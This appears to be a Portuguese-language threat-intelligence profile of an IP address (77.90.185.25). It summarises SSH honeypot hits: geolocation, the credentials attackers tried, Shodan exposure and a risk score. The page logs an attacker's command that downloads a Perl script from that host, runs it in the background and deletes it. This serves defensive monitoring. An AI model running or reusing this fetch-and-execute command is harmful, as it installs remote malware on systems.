TROYANOSYVIRUS
Ameaca AtivaMEDIO

77.90.185.25

Pais de Origem🇮🇷 Iran
Primeira Deteccao28/04/2026
Ultima Atividade28/04/2026
ISPLimited Network LTD
🎯
107
Ataques Totais
🔌
1
Portas
📡
1
Tipos de Ataque
🦠
1
Malware

Geolocalizacao

Pais
🇮🇷 Iran
Cidade
Desconhecida
ASN
AS213790
ISP
Limited Network LTD

Tipos de Ataque

ssh_telnet_honeypot

Portas Atacadas

22

Malware Associado

Credenciais Tentadas

🔐minoxidil4you/12345678
3x
🔐minoxidil4you/Minoxidil4you123@
3x
🔐minoxidil4you/minoxidil4you@2025
3x
🔐minoxidil4you/2020*Minoxidil4you
2x
🔐minoxidil4you/ADMIN2026
2x
🔐minoxidil4you/P@ssw0rd2026
2x

Comandos Executados

$cd /tmp && nohup sh -c 'wget -q -O /tmp/mot http://77.90.185.25/mot && mv /tmp/mot /tmp/mot.pl && perl /tmp/mot.pl && rm -f /tmp/mot.pl' >/tmp/remote_mot.log 2>&1 &2x

Exposicao Shodan InternetDBShodan

Dados InternetDB, nao em tempo real

Portas
22
CPEs
cpe:/o:canonical:ubuntu_linuxcpe:/a:openbsd:openssh:9.6p1

Avaliacao de Risco

45
/100
BaixoMedioAltoCritico